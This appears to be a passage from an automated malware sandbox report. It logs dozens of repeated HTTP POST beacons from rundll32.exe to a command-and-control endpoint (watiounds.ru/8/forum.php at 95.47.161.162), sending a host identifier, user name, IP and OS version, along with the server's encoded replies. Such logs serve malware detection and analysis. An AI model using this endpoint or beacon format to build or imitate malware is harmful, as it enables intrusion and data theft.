                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:56.099227905 CEST114INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:56 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 47 54 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFGTUARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          71192.168.2.224923695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:56.436139107 CEST114OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:56.559838057 CEST115INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:56 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 43 58 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFCXUARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          72192.168.2.224923795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:56.886367083 CEST116OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:57.010179996 CEST116INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:56 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 4d 4e 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKMNPARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          73192.168.2.224923895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:57.333587885 CEST117OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:57.462786913 CEST117INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:57 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 4e 4d 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHNMSARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          74192.168.2.224923995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:57.797476053 CEST118OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:57.925854921 CEST118INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:57 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 4b 50 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNKPMARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          75192.168.2.224924095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:58.255289078 CEST119OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:58.384263992 CEST119INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:58 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 46 55 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVFUEARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          76192.168.2.224924195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:58.723728895 CEST120OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:58.854806900 CEST120INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:58 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 43 58 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNCXMARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          77192.168.2.224924295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:59.171947956 CEST121OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:59.295538902 CEST122INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:59 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 4e 4d 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJNMQARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          78192.168.2.224924395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:59.606086016 CEST122OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:59.732573032 CEST123INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:59 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 43 58 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKCXPARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          79192.168.2.224924495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:00.045331955 CEST123OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:00.173826933 CEST124INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:00 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZZAAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          8192.168.2.224917395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:18:17.878882885 CEST23OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:18:18.001451015 CEST23INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:18:17 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 43 58 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKCXPARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          80192.168.2.224924595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:00.490439892 CEST124OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:00.612082958 CEST125INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:00 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 4d 4e 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCMNXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          81192.168.2.224924695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:00.941956043 CEST126OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:01.067533970 CEST126INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:01 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 48 53 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTHSGARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          82192.168.2.224924795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:01.393727064 CEST127OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:01.522456884 CEST127INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:01 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 56 45 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGVETARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          83192.168.2.224924895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:01.833338976 CEST128OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:01.958585024 CEST128INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:01 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 5a 41 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFZAUARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          84192.168.2.224924995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:02.279254913 CEST129OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:02.402828932 CEST129INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4d 4e 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZMNAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          85192.168.2.224925095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:02.733459949 CEST130OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:02.858032942 CEST130INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 51 4a 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJQJQARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          86192.168.2.224925195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:03.185461998 CEST131OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:03.309042931 CEST132INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:03 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 4e 4d 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGNMTARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          87192.168.2.224925295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:03.642880917 CEST132OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
